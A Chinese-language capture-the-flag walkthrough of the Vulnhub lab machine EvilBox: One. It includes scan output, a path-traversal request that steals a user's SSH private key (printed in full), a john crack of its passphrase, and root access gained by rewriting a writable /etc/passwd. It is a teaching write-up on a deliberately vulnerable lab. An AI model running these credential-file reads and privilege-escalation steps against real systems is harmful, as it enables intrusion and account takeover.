Vulnhub靶场--EVILBOX: ONE

环境配置

靶机连接

攻击者主机IP：192.168.47.130

目标主机IP：192.168.47.131

信息搜集

扫描目标主机，发现目标主机开放了22、80端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 192.168.47.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-08 07:46 EST
Nmap scan report for 192.168.47.131
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E9:5C:D1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.47.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.78 seconds

访问一下web页面发现是Apache默认页面

Web漏洞挖掘

使用gobuster爆破目录

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.47.131
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,php.bak,txt.bak,git.bak,git,zip,zip.bak,txt,html,js,html.bak,json
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/.html.bak            (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 317] [--> http://192.168.47.131/secret/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.html.bak            (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================

访问/robots.txt，没有什么内容



访问/secret，发现是一个空白页面



因为/secret是一个目录，并不是一个页面，所以考虑接着爆破http://192.168.47.131/secret/

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131/secret/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.47.131/secret/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip.bak,php,txt.bak,git,git.bak,html.bak,json,zip,txt,html,js,php.bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/.html.bak            (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/evil.php             (Status: 200) [Size: 0]
/.html.bak            (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================

发现该路径下存在/evil.php，访问该页面，发现该页面还是一个空白页面。



那么只可能是这个php页面需要传递参数，但是目前不知道有哪些参数，所以尝试爆破这个参数。爆破时考虑会不会是文件包含漏洞或者命令执行，而通过上面的爆破可以知道，有一个页面是index.html，所以尝试读取这个页面，看看是不是文件包含漏洞。

这里使用fuff工具进行模糊枚举。

┌──(kali㉿kali)-[~]
└─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.47.131/secret/evil.php?FUZZ=../index.html -fs 0

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.47.131/secret/evil.php?FUZZ=../index.html
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

command                 [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
:: Progress: [6453/6453] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

经过爆破，发现存在一个可以读取文件的参数command，既然可以读取文件，那么尝试读取/etc/passwd文件，通过读取这个文件，发现除了root用户还有mowree用户。



通过一开始的扫描可以知道目标主机开放了SSH服务，所以，尝试读取/home/mowree/.ssh/id_rsa，看看是否存在私钥。



读取之后发现该私钥是存在的，那么我们就可以使用这个私钥的用户登录目标主机。

┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
mowree@192.168.47.131's password:

使用id_rsa登录目标主机的时候发现该私钥是加密的，那么尝试使用john爆破私钥密码。

首先使用john的脚本把私钥转换成john可识别的ssh密钥文件：

┌──(kali㉿kali)-[~/tools]
└─$ curl http://192.168.47.131/secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa > id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1743  100  1743    0     0   373k      0 --:--:-- --:--:-- --:--:--  425k

┌──(kali㉿kali)-[~/tools]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----

┌──(kali㉿kali)-[~/tools]
└─$ /usr/share/john/ssh2john.py id_rsa > hash

接着，使用john爆破得到密码为unicorn：

┌──(kali㉿kali)-[~/tools]
└─$ john hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)
1g 0:00:00:00 DONE (2023-11-08 09:13) 100.0g/s 124800p/s 124800c/s 124800C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

使用私钥密码登录目标主机

┌──(kali㉿kali)-[~/tools]
└─$ chmod 600 id_rsa

┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$

提权

收集目标主机的信息

mowree@EvilBoxOne:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:e9:5c:d1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.47.131/24 brd 192.168.47.255 scope global dynamic ens33
       valid_lft 1225sec preferred_lft 1225sec
    inet6 fe80::20c:29ff:fee9:5cd1/64 scope link
       valid_lft forever preferred_lft forever
mowree@EvilBoxOne:~$ uname -a
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ pwd
/home/mowree

查找是否存在可以用于suid提权的文件，发现也没有

mowree@EvilBoxOne:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su

直接使用linpeas脚本检查，通过该脚本的检查，发现对/etc/passwd具有可写权限



既然文件可读写，那么直接自定义一个密码，覆盖root用户的密码，首先自定义密码为12345678

mowree@EvilBoxOne:~$ openssl passwd -1
Password:
Verifying - Password:
$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1

切换root用户，提权成功。

mowree@EvilBoxOne:~$ cat /etc/passwd | head -n 5
root:$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree#